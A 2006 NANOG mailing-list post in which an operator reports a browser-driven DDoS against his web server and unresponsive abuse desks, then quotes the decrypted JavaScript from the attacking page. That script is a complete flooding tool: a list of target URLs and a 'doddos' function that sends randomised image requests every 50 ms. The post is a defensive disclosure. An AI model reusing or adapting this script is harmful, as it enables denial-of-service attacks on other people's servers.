[89510] in North American Network Operators' Group
Ongoing DDoS helped by non responsive abuse desks
daemon@ATHENA.MIT.EDU (Martin Lathoud)
Thu Mar 23 10:55:27 2006
Date: Thu, 23 Mar 2006 10:54:56 -0500
From: "Martin Lathoud" <nytral@gmail.com>
To: nanog@merit.edu
Errors-To: owner-nanog@merit.edu
Hi,
One of our web servers got hammered by ~5K req/s for hours from
browsers with the following referer:
http://www.freewebs.com/ihatespammers/nospam.html
Both freewebs.com and their network provider Cogent has been contacted
without any visible result, even if the script is very effective (no
filtering slows it down but redirecting to an https with an invalid
cert eventually messes the attackers' browser).
Given that the source is still up (and has been updated since
yesterday), I wonder what one can expect by contacting each concerned
domain host.
The decrypted jscript is:
var target=3Dnew Array();
target[0]=3D"http://weerona.com/ph/order.php?%rand%"
target[1]=3D"http://fabutons.info/aw/001/?%rand%"
target[2]=3D"http://movi96.dayaugusta.com/aspx/search.asp?t=3D%rand%"
target[3]=3D"http://www.fakeidonline.com/store.php?%rand%"
target[4]=3D"http://ccebak.bestti.info/p/?%rand%"
target[5]=3D"http://www.zpgo.net/pweb7/texpo/?%rand%"
target[6]=3D"http://www.tex-win.com/productshow.asp?id=3D1808&%rand%=3D%ran=
d%"
target[7]=3D"http://7eklp9g3.tagsully.net/p/?%rand%&zz=3Dlowcost"
//target[5]=3D"http://zzizuyxxqquzjphyn.logomarz.com/counter.php?%rand%"
//target[6]=3D"http://svbcrwevktdbxf.logomarz.com/counter.php?%rand%"
//target[7]=3D"http://fqnbywsqfghz.logomarz.com/counter.php?%rand%"
//target[8]=3D"http://fvguwwnemlpgkd.logomarz.com/counter.php?%rand%"
//target[9]=3D"http://www.logodentity.com/ordernow.php?%rand%"
//target[10]=3D"http://www.clearlogo.com/ordernow.php?plan=3D1&%rand%=3D%ra=
nd%"
//target[11]=3D"http://www.heartysouvenirs.info/?page=3Dshoppingcart&%rand%=
=3D%rand%"
//target[9]=3D"http://www.webpromotionnow.com/?%rand%"
// Do not edit below this line
var arrcount =3D 0;
var chars =3D "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx=
yz";
function doddos(){
var randomstring =3D '';
for (var i=3D0; i<8; i++) {
var rnum =3D Math.floor(Math.random() * chars.length);
randomstring +=3D chars.substring(rnum,rnum+1);
}
if (arrcount > (target.length - 1)){
arrcount =3D 0;
}
var dimg =3D new Image;
dimg.src=3Dtarget[arrcount].replace(/\%rand\%/g,randomstring);
arrcount++;
setTimeout("doddos()",50);
}
setTimeout("doddos()",50);
